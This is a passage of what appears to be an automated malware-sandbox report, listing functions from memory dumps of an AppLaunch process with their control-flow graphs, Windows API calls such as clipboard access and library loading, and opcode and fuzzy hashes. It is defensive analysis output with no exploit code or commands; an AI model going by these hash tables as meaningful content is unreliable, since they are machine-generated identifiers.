                                                                                                                                    • API ID: CreateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                    • Opcode ID: 950ecf605d2acab381fe3ae86c894221343f1891bebbf1b785ae2c64b1eaaf41
                                                                                                                                    • Instruction ID: a65cf31567f20a492bd1a67664822df48b0b35a6dbfbc6519184d316f32e5edd
                                                                                                                                    • Opcode Fuzzy Hash: 950ecf605d2acab381fe3ae86c894221343f1891bebbf1b785ae2c64b1eaaf41
                                                                                                                                    • Instruction Fuzzy Hash: E141B1B1D003099FDF15CF99D984ADEFBB5BF88314F25852AE419AB210D7749885CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097F8120, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 730 97f8120-97f812f 731 97f8130 730->731 732 97f813e-97f8145 731->732 733 97f8132-97f8135 call 97f6c7c 731->733 735 97f815a-97f816d 732->735 736 97f8147-97f8157 call 97f7be0 732->736 737 97f813a-97f813c 733->737 735->731 741 97f816f-97f81ec CreateIconFromResourceEx 735->741 737->732 742 97f81ee-97f81f4 741->742 743 97f81f5-97f8212 741->743 742->743
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFromIconResource
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3668623891-0
                                                                                                                                    • Opcode ID: aadb6df78cbafa3832d5bbe3738395a6768a68a9637d8060db9f235d9757f48d
                                                                                                                                    • Instruction ID: 77310b810389939e307a20adcccb22feb3f985755b968851e60aa3cd376d659a
                                                                                                                                    • Opcode Fuzzy Hash: aadb6df78cbafa3832d5bbe3738395a6768a68a9637d8060db9f235d9757f48d
                                                                                                                                    • Instruction Fuzzy Hash: EB31DC728043499FCF02CFA8D844AEEBFF8EF49310F14805AE615AB221C7359840CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097F9DE8, Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 746 97f9de8-97fa458 OleGetClipboard 749 97fa45a-97fa460 746->749 750 97fa461-97fa472 746->750 749->750 751 97fa47c-97fa4af 750->751 755 97fa4bf 751->755 756 97fa4b1-97fa4b5 751->756 758 97fa4c0 755->758 756->755 757 97fa4b7 756->757 757->755 758->758
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 220874293-0
                                                                                                                                    • Opcode ID: e45ddad396459565b5964d41a33e8ebd48447a80133ac0ac38f523599149d00d
                                                                                                                                    • Instruction ID: 2c76b91a5c759d74057470c4eb76f97473d0737ddad32b34d7c6c1db3101aa52
                                                                                                                                    • Opcode Fuzzy Hash: e45ddad396459565b5964d41a33e8ebd48447a80133ac0ac38f523599149d00d
                                                                                                                                    • Instruction Fuzzy Hash: B431F6B0D00219DFDB14CF99C598BDEBBF5AF48314F248019E508BB390EB74A945CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097FA3BB, Relevance: 1.6, APIs: 1, Instructions: 73comclipboardCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 759 97fa3bb-97fa410 760 97fa41a-97fa458 OleGetClipboard 759->760 761 97fa45a-97fa460 760->761 762 97fa461-97fa472 760->762 761->762 763 97fa47c-97fa4af 762->763 767 97fa4bf 763->767 768 97fa4b1-97fa4b5 763->768 770 97fa4c0 767->770 768->767 769 97fa4b7 768->769 769->767 770->770
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 220874293-0
                                                                                                                                    • Opcode ID: 3dfa61d6c9efb6678669c229201761882471d075bf8c4f1adca2e836cee6c272
                                                                                                                                    • Instruction ID: 8fd0b0867b8981a84e33f659b773788e5f9ddbfaaba5d682d1358357a1cafb57
                                                                                                                                    • Opcode Fuzzy Hash: 3dfa61d6c9efb6678669c229201761882471d075bf8c4f1adca2e836cee6c272
                                                                                                                                    • Instruction Fuzzy Hash: DD31E1B0D002189FDB14CF99C998BDEBBF1AF48318F248029E508BB390DB74A945CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0569B838, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 771 569b838-569b8d4 DuplicateHandle 772 569b8dd-569b8fa 771->772 773 569b8d6-569b8dc 771->773 773->772
                                                                                                                                    APIs
                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0569B8C7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                    • Opcode ID: 519cedacf583e8e786c0ac1dbe87974f25be2af697df26f6b916d3c047464ec9
                                                                                                                                    • Instruction ID: 8378eadb4c6182368af23cdfec9381522241674f9b27f2d9cf3b41a0439d4318
                                                                                                                                    • Opcode Fuzzy Hash: 519cedacf583e8e786c0ac1dbe87974f25be2af697df26f6b916d3c047464ec9
                                                                                                                                    • Instruction Fuzzy Hash: 6221F3B5D002089FCF10CF99E584AEEBBF8EF48314F14841AE915A7610C778A944CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0569B840, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 776 569b840-569b8d4 DuplicateHandle 777 569b8dd-569b8fa 776->777 778 569b8d6-569b8dc 776->778 778->777
                                                                                                                                    APIs
                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0569B8C7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                    • Opcode ID: 71d8772e60d963a183f0cbb0aa7b3fe8ee5dc58918defe767186e5443b9f6613
                                                                                                                                    • Instruction ID: cc7b705ab0dff2c2a906a64ce8a45af2df008050bf61c0d8397aabffe59b6d17
                                                                                                                                    • Opcode Fuzzy Hash: 71d8772e60d963a183f0cbb0aa7b3fe8ee5dc58918defe767186e5443b9f6613
                                                                                                                                    • Instruction Fuzzy Hash: 1F21C4B5D002099FDF10CF99E984ADEBBF8FB48324F14851AE914A7310D778A944CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097F6C7C, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,097F813A,?,?,?,?,?), ref: 097F81DF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFromIconResource
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3668623891-0
                                                                                                                                    • Opcode ID: f7dd2ffd7fd5184fb9c4a9f866f2600122c47d397a726d438a18fdc8c8f1b5ba
                                                                                                                                    • Instruction ID: a3c2870216e122d427acf2b0d9203bcb43819e9cc3fdfa81f32f7154a65ac20b
                                                                                                                                    • Opcode Fuzzy Hash: f7dd2ffd7fd5184fb9c4a9f866f2600122c47d397a726d438a18fdc8c8f1b5ba
                                                                                                                                    • Instruction Fuzzy Hash: BB1167B29002099FDF10CFA9D844BDEBFF8EB48324F14841AEA15B7210C739A954CFA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05698298, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,056991E9,00000800,00000000,00000000), ref: 056993FA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: f0139ed638ef320463729cd0b7aada6bad64672d336914007f7b18e638b4099c
                                                                                                                                    • Instruction ID: 2ae514d0dc04b13f0215df51b034e6897e501c10fa2de2effe5addd39658582e
                                                                                                                                    • Opcode Fuzzy Hash: f0139ed638ef320463729cd0b7aada6bad64672d336914007f7b18e638b4099c
                                                                                                                                    • Instruction Fuzzy Hash: E01133B29042089FCB14CF9AD444BDEBBF8EB88314F14852EE519B7200C775A945CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05699389, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,056991E9,00000800,00000000,00000000), ref: 056993FA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: 3c097fc9895d9598aaa8b083271a7329fba6b60afacce9dea84b680a7037ddda
                                                                                                                                    • Instruction ID: a7be753e01ab471326ab447e20ca313bd6f34cc6623809985fed7921508031cb
                                                                                                                                    • Opcode Fuzzy Hash: 3c097fc9895d9598aaa8b083271a7329fba6b60afacce9dea84b680a7037ddda
                                                                                                                                    • Instruction Fuzzy Hash: 061153B2D042089FCB14CFAAC444ADEFBF8AB88324F14842EE519A7600C779A545CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0569F978, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0569F9DD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1378638983-0
                                                                                                                                    • Opcode ID: 7fa32bd50cf3990ab0539e9852cce2ad0bfdb5d1bdb14ce390674173c277d7d7
                                                                                                                                    • Instruction ID: 0f21af325791af5eb8d53843d854e0c08355cd330f2b0ffa7d29328e6e67474e
                                                                                                                                    • Opcode Fuzzy Hash: 7fa32bd50cf3990ab0539e9852cce2ad0bfdb5d1bdb14ce390674173c277d7d7
                                                                                                                                    • Instruction Fuzzy Hash: DD11F5B58002099FDB10CF99D585BDEFBF8FB89324F25851AE415B7600C774A945CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097F6CC0, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 097F853D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 4299058c3a485bab573e4c97e584fc4bac5439e54ac66c84cfe2125d47f351e3
                                                                                                                                    • Instruction ID: c5665e92cad2b5a744e1f681f04e804f254b45cc5f1e8e20923bd58f1722f340
                                                                                                                                    • Opcode Fuzzy Hash: 4299058c3a485bab573e4c97e584fc4bac5439e54ac66c84cfe2125d47f351e3
                                                                                                                                    • Instruction Fuzzy Hash: E211F5B68006499FCB10CF99D485BDEBBF8FB48324F148419E515B7300C774A944CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05699108, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0569916E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleModule
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                    • Opcode ID: b1a3a700f843b96dddd11b3e3955e80a5cf72937c2411f7e2b9c361135a65bdc
                                                                                                                                    • Instruction ID: bab61e30ba2b670c8943eac9b6bcbacd9fdf8e7294e76497945b0deb7017354f
                                                                                                                                    • Opcode Fuzzy Hash: b1a3a700f843b96dddd11b3e3955e80a5cf72937c2411f7e2b9c361135a65bdc
                                                                                                                                    • Instruction Fuzzy Hash: 6B110FB5C006098FCB14CF9AD848ADEFBF8BB88324F15852AD429A7610C778A545CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097F3DF0, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,097F44C0), ref: 097F9FD7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                    • Opcode ID: 8c3bc7eceee69fe2b84ae6149f2f353c37e2629cb2b81002df7e1df087b08297
                                                                                                                                    • Instruction ID: 7a4b4b39aa3bc8b0d1269cadd1af62533820af6901903e30e4ed4c0fdbd0a199
                                                                                                                                    • Opcode Fuzzy Hash: 8c3bc7eceee69fe2b84ae6149f2f353c37e2629cb2b81002df7e1df087b08297
                                                                                                                                    • Instruction Fuzzy Hash: 5B1145B18046088FCB20CF9AD584BDEBBF8EB48324F14845AE619B7300C774A944CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097F6E8C, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 097FA2CD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Initialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                    • Opcode ID: 8d8aff528c2f23acd231b3bd11ab44a54d73eb8da41f8cd7d90a851bd05adac7
                                                                                                                                    • Instruction ID: 273d9e0f35eaea9acd0ba8f0ba9ae961ef11f11925b2295cb8535301ee45bbec
                                                                                                                                    • Opcode Fuzzy Hash: 8d8aff528c2f23acd231b3bd11ab44a54d73eb8da41f8cd7d90a851bd05adac7
                                                                                                                                    • Instruction Fuzzy Hash: E11136B1A006088FCB10CF99D5847DEBBF4EB48324F148519E518B7300D779A944CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097F9F75, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,097F44C0), ref: 097F9FD7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                    • Opcode ID: be8c9e8d1227cfeb1722b0206283b8b2157234a96a03c1c0e74d786cb2d7dc37
                                                                                                                                    • Instruction ID: 3e9e94eedd71d0eedd9225ed81aac9ebc7a320f2c828ee8bfdb78ae2e9812a07
                                                                                                                                    • Opcode Fuzzy Hash: be8c9e8d1227cfeb1722b0206283b8b2157234a96a03c1c0e74d786cb2d7dc37
                                                                                                                                    • Instruction Fuzzy Hash: FF1127B58006098FCB10CF9AD485BDEFBF4EB48324F14845AD619B7340C774A945CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097F84DF, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 097F853D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: ea2cbb48eb45adaeb2b2a82d6490b1cef3c984e130402f14f69d5e5396ac6af7
                                                                                                                                    • Instruction ID: dc9d81c1bc2c09533e51e050a839092443e9c7c3c13323cc4bb35520d6a4d983
                                                                                                                                    • Opcode Fuzzy Hash: ea2cbb48eb45adaeb2b2a82d6490b1cef3c984e130402f14f69d5e5396ac6af7
                                                                                                                                    • Instruction Fuzzy Hash: 1B11D3B58006499FDB10CF99D585BDEBBF8EB48324F14851AE519B7200C775A544CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0569F980, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0569F9DD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1378638983-0
                                                                                                                                    • Opcode ID: ed446d18f612f9c7b613dc2051127144011f0cd2b7907b88e68d5ba2168501d3
                                                                                                                                    • Instruction ID: 7fc0c2266b6e93d211fcf789f05b056a028434536936c37fb38215b2dce8d41f
                                                                                                                                    • Opcode Fuzzy Hash: ed446d18f612f9c7b613dc2051127144011f0cd2b7907b88e68d5ba2168501d3
                                                                                                                                    • Instruction Fuzzy Hash: D01103B58002099FDB10CF99D585BDEFBF8EB48324F24851AE915A7300C774A944CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097FA273, Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 097FA2CD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Initialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                    • Opcode ID: 088f330b37e120943cca15178c2c8d03ad8e8bdb18a8ea050b94ebd4236468e3
                                                                                                                                    • Instruction ID: 9eec8196eb695e0ba1df1efcb7e17c0b08558c7c1be8ffbd73db70b6de6196f0
                                                                                                                                    • Opcode Fuzzy Hash: 088f330b37e120943cca15178c2c8d03ad8e8bdb18a8ea050b94ebd4236468e3
                                                                                                                                    • Instruction Fuzzy Hash: 471103B19006498FCB14CF99D5887DEBBF4AB88324F24852AD519B7200D739A944CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 053BD3D8, Relevance: .1, Instructions: 75COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.921494816.00000000053BD000.00000040.00000001.sdmp, Offset: 053BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_53bd000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 09643bf1ca5a6211e75f4aaf912a7065849b2090df379e7d008747de0d8d8e43
                                                                                                                                    • Instruction ID: 7526e2ad230e076333b986f3788aefc1be6a9cf4754f9e5e7cfd7f2613afbdf5
                                                                                                                                    • Opcode Fuzzy Hash: 09643bf1ca5a6211e75f4aaf912a7065849b2090df379e7d008747de0d8d8e43
                                                                                                                                    • Instruction Fuzzy Hash: 62213A71504240DFEB04CF10D9C0F66BB6AFB84324F24C969DA094FA06C7B6E866C7A2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 053BD4C4, Relevance: .1, Instructions: 75COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.921494816.00000000053BD000.00000040.00000001.sdmp, Offset: 053BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_53bd000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1bfa1188edd29dbef0f4ed985ee92daacf2d7cbd317051f6c5603bde7e39d970
                                                                                                                                    • Instruction ID: a6b5c89e3f3e548b6caabb19d9e232f0c722e5a77ebf027abc8e312184fb5820
                                                                                                                                    • Opcode Fuzzy Hash: 1bfa1188edd29dbef0f4ed985ee92daacf2d7cbd317051f6c5603bde7e39d970
                                                                                                                                    • Instruction Fuzzy Hash: 81213A71504240DFEB01DF14D9C0F66BF66FB84318F24C96ADA050FA06C7B6D956CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 053CD01C, Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.921727752.00000000053CD000.00000040.00000001.sdmp, Offset: 053CD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_53cd000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a38088eb9e96b53f32277cf7965f1a74d31b976dd89fe5e7e4742d67141b172e
                                                                                                                                    • Instruction ID: cc8d5cb7d9b0896b79956ff1fcb160d6618023d3080221c84b16532c111256a7
                                                                                                                                    • Opcode Fuzzy Hash: a38088eb9e96b53f32277cf7965f1a74d31b976dd89fe5e7e4742d67141b172e
                                                                                                                                    • Instruction Fuzzy Hash: 1321CF71604680DFDB14CF18D9C0B26BFA6FB84224F64C9BDE90A4B646C776D846CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 053CD006, Relevance: .1, Instructions: 63COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.921727752.00000000053CD000.00000040.00000001.sdmp, Offset: 053CD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_53cd000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a15ceaf15106438fd801a21dbf6c25b2f720276ab0e916129959605906f5e424
                                                                                                                                    • Instruction ID: 5ff222c32cf41224877388ce64cc9e44e019d2869b60344504eb800306d61ed4
                                                                                                                                    • Opcode Fuzzy Hash: a15ceaf15106438fd801a21dbf6c25b2f720276ab0e916129959605906f5e424
                                                                                                                                    • Instruction Fuzzy Hash: E2216F755083C09FCB02CF24D994B11BF71FB46214F29C5EAD8498F6A7C37A985ACB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 053BD4BF, Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.921494816.00000000053BD000.00000040.00000001.sdmp, Offset: 053BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_53bd000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 14f94134bb014abb579cfd279659e17573a78b517b5aeb89abd8cbe1213a7701
                                                                                                                                    • Instruction ID: 62b5780d05b29d771c2fd599183f77be46c1700a37c19b502e37e08952a7cd83
